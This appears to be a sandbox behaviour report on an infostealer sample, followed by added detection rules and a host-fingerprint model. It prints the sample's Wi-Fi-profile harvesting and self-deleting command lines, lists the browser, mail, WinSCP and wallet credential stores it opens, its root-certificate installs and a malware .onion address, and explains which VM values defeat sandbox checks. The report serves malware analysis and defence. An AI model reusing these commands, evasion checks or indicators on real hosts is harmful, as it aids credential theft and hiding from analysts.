                Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
                Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\PING.EXESection loaded: cryptbase.dllJump to behavior
                Source: Stealer.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                Source: 0.0.Stealer.exe.ad0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                Source: 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                Source: Process Memory Space: Stealer.exe PID: 2308, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                Source: Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: .csproj2
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@15/0@5/5
                Source: C:\Users\user\Desktop\Stealer.exeMutant created: NULL
                Source: C:\Users\user\Desktop\Stealer.exeMutant created: \Sessions\1\BaseNamedObjects\npbouttkra
                Source: C:\Users\user\Desktop\Stealer.exeFile created: C:\Users\user\AppData\Local\Temp\tmpC8CC.tmpJump to behavior
                Source: C:\Windows\System32\cmd.exeConsole Write: ...................J....................................@c.J..... ......0.-...............jw..............-.............f.................N.....Jump to behavior
                Source: Stealer.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Stealer.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\Stealer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                Source: C:\Users\user\Desktop\Stealer.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Stealer.exe "C:\Users\user\Desktop\Stealer.exe"
                Source: C:\Users\user\Desktop\Stealer.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr All
                Source: C:\Users\user\Desktop\Stealer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\user\Desktop\Stealer.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1
                Source: C:\Users\user\Desktop\Stealer.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\user\Desktop\Stealer.exe"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profileJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr AllJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1Jump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Stealer.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Stealer.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Stealer.exe | Static PE information: 0x81805410 [Sat Nov 6 15:43:12 2038 UTC] (the high bit of the TimeDateStamp is set; .NET compilers in deterministic-build mode store a content hash with the high bit set in this field, so the 2038 date by itself does not prove the timestamp was forged)
Source: C:\Users\user\Desktop\Stealer.exe | Code function: 0_2_000007FE93DA79CD push ebx; retf 0_2_000007FE93DA79DA
Source: C:\Users\user\Desktop\Stealer.exe | Code function: 0_2_000007FE93D9D980 pushad ; iretd 0_2_000007FE93D9D929
Source: C:\Users\user\Desktop\Stealer.exe | Code function: 0_2_000007FE93D800BD pushad ; iretd 0_2_000007FE93D800C1
Source: Stealer.exe, mQ.cs | High entropy of concatenated method names: '_003CPerformSelfDestruct_003Eb__1_0', '_003CPerformSelfDestruct_003Eb__1_1', '_003CPerformSelfDestruct_003Eb__1_2', 'HandleSelfDestruct', 'Iqvoaankwbsmkeovdsfoek', 'Iuvlwqesyazuazlxlvwmse', 'Idjirxbssjfcxsxjblftyf', 'Ipyirndbhzenzwaglixhwt', 'Icbxquhcchziremzkgwyky', 'Iwxcwnfbitkwelqzupxifu'

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\Stealer.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob (5 times)
Source: C:\Users\user\Desktop\Stealer.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob (2 times)

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\cmd.exe | File deleted: c:\users\user\desktop\stealer.exe
Source: C:\Users\user\Desktop\Stealer.exe | Process created: "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\user\Desktop\Stealer.exe" (2 times)
Source: unknown | Network traffic detected: HTTP traffic on port 49166 -> 9200
Source: unknown | Network traffic detected: HTTP traffic on port 9200 -> 49166 (2 times)
Source: C:\Users\user\Desktop\Stealer.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\Users\user\Desktop\Stealer.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Users\user\Desktop\Stealer.exe | Process information set: NOOPENFILEERRORBOX (56 times)
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX (6 times)
Source: C:\Windows\System32\netsh.exe | Process information set: NOOPENFILEERRORBOX (2 times)
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX (3 times)

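The rows in this and the two preceding sections describe one observable chain: a cmd.exe child running `netsh wlan show profile`, a second cmd.exe child that sleeps on `ping 127.0.0.1` and then deletes the parent executable, registry writes under `SystemCertificates\ROOT\Certificates`, and the sample opening browser credential stores. The following detection logic is an added example, not code from the Joe Sandbox report or from the sample: it runs four rules over a constructed event stream that mirrors the report rows. The event schema (kind, image, detail, parent), the assumption that parent-image data is available for process events, and the "anything outside C:\Windows writing a ROOT certificate is suspect" heuristic are assumptions, not facts from the report.

```python
"""Detection logic for the behaviour chain recorded above: Wi-Fi profile harvesting
via netsh, self-deletion via cmd /C ping && DEL, root-certificate installation
through HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT, and non-browser access
to browser credential stores. Added example, not code from the report or the sample;
the event schema and sample events are constructed to mirror the report rows."""
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str          # "process", "registry" or "file" (assumed telemetry categories)
    image: str         # full path of the acting process
    detail: str        # command line, registry value path or file path
    parent: str = ""   # parent image for process events (assumed available, as in Sysmon EID 1)


# Constructed sample events modelled on the report (not real telemetry).
STEALER = r"C:\Users\user\Desktop\Stealer.exe"
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [
    Event("process", CMD, r'"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All', STEALER),
    Event("process", r"C:\Windows\System32\netsh.exe", "netsh wlan show profile", CMD),
    Event("process", CMD,
          r'"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\user\Desktop\Stealer.exe"',
          STEALER),
    Event("registry", STEALER,
          r"HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8\Blob"),
    Event("file", STEALER, r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    # Benign noise that must not fire: the browser reading its own store, a user pinging localhost.
    Event("file", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
          r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    Event("process", CMD, "ping 127.0.0.1", r"C:\Windows\explorer.exe"),
]

# "netsh wlan show profile" lists SSIDs; the same prefix also matches a "... <ssid> key=clear" follow-up.
NETSH_WLAN = re.compile(r"\bnetsh(?:\.exe)?\s+wlan\s+show\s+profile", re.I)
# ping to localhost used as a sleep, then DEL of an .exe; the DEL target is compared with the parent image.
SELF_DELETE = re.compile(
    r'\bping\s+(?:-n\s+\d+\s+)?127\.0\.0\.1.*?&&\s*del\s+(?:/[a-z]\s+)*"?(?P<target>[^"]+?\.exe)"?', re.I)
ROOT_CERT = re.compile(r"\\SystemCertificates\\ROOT\\Certificates\\([0-9A-F]{40})", re.I)
CRED_STORE = re.compile(
    r"\\(Login Data|Web Data|Cookies|cookies\.sqlite|key3\.db|key4\.db|logins\.json)$", re.I)
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, image, detail) for every event that matches one of the four rules."""
    hits = []
    for e in events:
        if e.kind == "process":
            if NETSH_WLAN.search(e.detail):
                hits.append(("wifi_profile_harvest", e.image, e.detail))
            m = SELF_DELETE.search(e.detail)
            if m and m.group("target").lower() == e.parent.lower():
                hits.append(("self_delete", e.parent, e.detail))
        elif e.kind == "registry":
            m = ROOT_CERT.search(e.detail)
            # Assumption: a ROOT certificate written by anything outside C:\Windows is suspect;
            # enterprise certificate-deployment tools would need an allowlist here.
            if m and not e.image.lower().startswith("c:\\windows\\"):
                hits.append(("root_cert_install", e.image, m.group(1).upper()))
        elif e.kind == "file":
            if CRED_STORE.search(e.detail) and basename(e.image) not in BROWSERS:
                hits.append(("browser_credential_store_access", e.image, e.detail))
    return hits


if __name__ == "__main__":
    for rule, image, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:32} {image}\n{'':32} {detail}")
```

Against the constructed stream the self-delete rule fires only because the DEL target equals the parent image; a plain `ping 127.0.0.1` from explorer.exe and Chrome reading its own `Login Data` stay silent. The root-certificate rule reports the thumbprint, which can be compared directly with the two thumbprints listed in the persistence section and removed with certutil or the Certificates MMC snap-in on affected hosts.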
Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Stealer.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Size FROM Win32_LogicalDisk WHERE DriveType = 3
Source: C:\Users\user\Desktop\Stealer.exe | Memory allocated: 2C0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Stealer.exe | Memory allocated: 1A1B0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Stealer.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Stealer.exe | Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\Stealer.exe | Window / User API: threadDelayed 493
Source: C:\Users\user\Desktop\Stealer.exe | Window / User API: threadDelayed 9341
Source: C:\Users\user\Desktop\Stealer.exe TID: 2692 | Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\Desktop\Stealer.exe TID: 2648 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\Stealer.exe TID: 2648 | Thread sleep time: -3600000s >= -30000s
Source: C:\Users\user\Desktop\Stealer.exe TID: 2588 | Thread sleep count: 493 > 30
Source: C:\Users\user\Desktop\Stealer.exe TID: 2588 | Thread sleep count: 9341 > 30
Source: C:\Windows\System32\netsh.exe TID: 2700 | Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\Desktop\Stealer.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select TotalPhysicalMemory From Win32_ComputerSystem
Source: C:\Users\user\Desktop\Stealer.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Model from Win32_ComputerSystem
Source: C:\Users\user\Desktop\Stealer.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Manufacturer from Win32_ComputerSystem
Source: C:\Users\user\Desktop\Stealer.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\Stealer.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Stealer.exe | Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\Stealer.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Stealer.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\Stealer.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\Stealer.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: C:\Users\user\Desktop\Stealer.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\user\Desktop\Stealer.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr All
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1
Source: C:\Users\user\Desktop\Stealer.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (2 times)
Source: C:\Users\user\Desktop\Stealer.exe | Queries volume information: C:\Users\user\Desktop\Stealer.exe VolumeInformation
Source: C:\Users\user\Desktop\Stealer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

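The WMI and registry queries in the evasion section (fixed-disk size, TotalPhysicalMemory, Model, Manufacturer, processor name, plus CentralProcessor\0 and MachineGuid) are the inputs of a host fingerprint that decides whether the stealer runs or goes to sleep. The model below is an added example written for this page, not the sample's own logic: it evaluates constructed answers to exactly those queries the way a VM-aware check typically does, so an analyst can see which value gives an analysis VM away. The cut-offs (60 GB disk, 4 GB RAM) and the vendor substrings are assumptions; the report does not reveal the stealer's real thresholds.

```python
"""Host-fingerprint model for the WMI/registry queries in the evasion section.
Added example, not the sample's code; thresholds and vendor strings are assumptions."""
from dataclasses import dataclass

# Assumed vendor/model substrings that a VM-aware check looks for.
VM_MARKERS = ("vmware", "virtualbox", "innotek", "qemu", "kvm", "xen", "bochs",
              "parallels", "virtual machine", "hyper-v")
MIN_DISK_BYTES = 60 * 2**30   # assumed cut-off: fixed disks under 60 GB are rare on real desktops
MIN_RAM_BYTES = 4 * 2**30     # assumed cut-off: under 4 GB is a common default VM allocation


@dataclass
class HostProfile:
    """Answers to the queries listed in the report, one field per query."""
    disk_size: int        # SELECT Size FROM Win32_LogicalDisk WHERE DriveType = 3 (largest fixed disk)
    physical_memory: int  # Select TotalPhysicalMemory From Win32_ComputerSystem
    model: str            # Select Model from Win32_ComputerSystem
    manufacturer: str     # Select Manufacturer from Win32_ComputerSystem
    processor_name: str   # SELECT Name FROM Win32_Processor / HKLM\HARDWARE\...\CentralProcessor\0


def sandbox_tells(p: HostProfile) -> list:
    """Return the fingerprint fields that would mark this host as an analysis VM."""
    tells = []
    if p.disk_size < MIN_DISK_BYTES:
        tells.append("disk_size")
    if p.physical_memory < MIN_RAM_BYTES:
        tells.append("physical_memory")
    for field in ("model", "manufacturer", "processor_name"):
        value = getattr(p, field).lower()
        if any(marker in value for marker in VM_MARKERS):
            tells.append(field)
    return tells


def looks_like_sandbox(p: HostProfile) -> bool:
    return bool(sandbox_tells(p))


# Constructed profiles (not real telemetry): a stock VirtualBox guest, a hardened
# analysis VM with spoofed SMBIOS strings, and a default QEMU guest.
DEFAULT_VBOX = HostProfile(40 * 2**30, 2 * 2**30, "VirtualBox", "innotek GmbH",
                           "Intel(R) Core(TM) i7-8700 CPU @ 3.20GHz")
HARDENED_VM = HostProfile(250 * 2**30, 16 * 2**30, "OptiPlex 7090", "Dell Inc.",
                          "Intel(R) Core(TM) i7-8700 CPU @ 3.20GHz")
QEMU_GUEST = HostProfile(120 * 2**30, 8 * 2**30, "Standard PC (Q35 + ICH9, 2009)", "QEMU",
                         "QEMU Virtual CPU version 2.5+")

if __name__ == "__main__":
    for name, prof in (("default VirtualBox", DEFAULT_VBOX), ("hardened VM", HARDENED_VM),
                       ("QEMU guest", QEMU_GUEST)):
        print(f"{name:20} sandbox={looks_like_sandbox(prof)} tells={sandbox_tells(prof)}")
```

Disk and memory sizes are cheap to raise when provisioning the VM; Model, Manufacturer and the CPU name come from SMBIOS and CPUID and need hypervisor-level spoofing, which is why the QEMU profile above is still caught on two fields even with generous resources. The long sleeps in the same section (600000 ms and the 922337203685477 ms delay) are the other half of the evasion and have to be handled by the sandbox's sleep skipping rather than by this check.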
Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Stealing of Sensitive Information

Source: Yara match | File source: Stealer.exe, type: SAMPLE
Source: Yara match | File source: 0.0.Stealer.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.333992859.0000000000AD2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Stealer.exe PID: 2308, type: MEMORYSTR
Source: C:\Users\user\Desktop\Stealer.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\Desktop\Stealer.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-Qt
Source: C:\Users\user\Desktop\Stealer.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\Desktop\Stealer.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\Stealer.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\Stealer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Stealer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite
Source: C:\Users\user\Desktop\Stealer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
Source: C:\Users\user\Desktop\Stealer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\Stealer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Desktop\Stealer.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\Desktop\Stealer.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\Desktop\Stealer.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\Desktop\Stealer.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\Desktop\Stealer.exe | Directory queried: C:\Users\user\Documents (5 times)
Source: C:\Users\user\Desktop\Stealer.exe | Directory queried: C:\Users\user\Documents\CURQNKVOIX (3 times)
                Source: C:\Users\user\Desktop\Stealer.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeDirectory queried: C:\Users\user\Documents\Outlook FilesJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeDirectory queried: C:\Users\user\Documents\Outlook FilesJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
                Source: Yara matchFile source: Process Memory Space: Stealer.exe PID: 2308, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Stealer.exe, type: SAMPLE
                Source: Yara matchFile source: 0.0.Stealer.exe.ad0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000000.333992859.0000000000AD2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Stealer.exe PID: 2308, type: MEMORYSTR
MITRE ATT&CK Matrix, listed per tactic column (a number in front of a technique is the count shown for that cell in the matrix; techniques without a number are unmarked matrix cells):

• Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
• Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
• Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
• Execution: 121 Windows Management Instrumentation; 1 Command and Scripting Interpreter; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
• Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
• Privilege Escalation: 1 DLL Side-Loading; 11 Process Injection; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
• Defense Evasion: 11 Disable or Modify Tools; 1 Obfuscated Files or Information; 1 Install Root Certificate; 1 Timestomp; 1 DLL Side-Loading; 2 File Deletion; 1 Modify Registry; 51 Virtualization/Sandbox Evasion; 11 Process Injection
• Credential Access: 1 OS Credential Dumping; 1 Credentials in Registry; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
• Discovery: 11 File and Directory Discovery; 34 System Information Discovery; 12 Security Software Discovery; 1 Query Registry; 1 Process Discovery; 51 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 11 Remote System Discovery; 11 System Network Configuration Discovery
• Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
• Collection: 1 Archive Collected Data; 11 Data from Local System; 1 Screen Capture; 1 Email Collection; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
• Command and Control: 1 Web Service; 1 Ingress Tool Transfer; 11 Encrypted Channel; 11 Non-Standard Port; 3 Non-Application Layer Protocol; 4 Application Layer Protocol; 1 Proxy; Application Layer Protocol; Web Protocols
• Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
• Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID: 1417452; Sample: Stealer.exe; Start date: 29/03/2024; Architecture: WINDOWS; Score: 100)

Signatures attached to the sample node: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Antivirus / Scanner detection for submitted sample; 7 other signatures

Stealer.exe (started; graph badges 13 and 4, which per the graph legend are the number of created registry values and created files)
• DNS/IP: pastebin.com; ip-api.com 208.95.112.1 (ports 49163, 80), TUT-ASUS, United States; 3 other IPs or domains
• Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Installs new ROOT certificates; Tries to steal Mail credentials (via file / registry access); 6 other signatures
• Signature on the pastebin.com node: Connects to a pastebin service (likely for C&C)
• Child process cmd.exe (started)
  • Signatures: Uses ping.exe to check the status of other devices and networks; Uses netsh to modify the Windows network and firewall settings; Tries to harvest and steal WLAN passwords
  • Child processes: netsh.exe (started); findstr.exe (started); chcp.com (started)
• Child process cmd.exe (started)
  • Signature: Deletes itself after installation
  • Child processes: PING.EXE (started; DNS/IP: 127.0.0.1 unknown unknown); chcp.com (started)

Source | Detection | Scanner | Label
Stealer.exe | 100% | Avira | HEUR/AGEN.1307453
Stealer.exe | 100% | Joe Sandbox ML | -
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://ocsp.entrust.net03 | 0% | URL Reputation | safe
http://ocsp.entrust.net03 | 0% | URL Reputation | safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe
http://ocsp.entrust.net0D | 0% | URL Reputation | safe
http://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/4c9395d28d054ddebee26b2aa | 100% | Avira URL Cloud | malware
http://pastebin.comp | 0% | Avira URL Cloud | safe
http://t.mep | 0% | Avira URL Cloud | safe
https://cdn5.cdn-telegram.org/file/urI_EKpgc2j3bnVEG7hJPiftbxwqp29Csge9PUwai_V9SyHDH8vYkc30DN237hWwA | 0% | Avira URL Cloud | safe
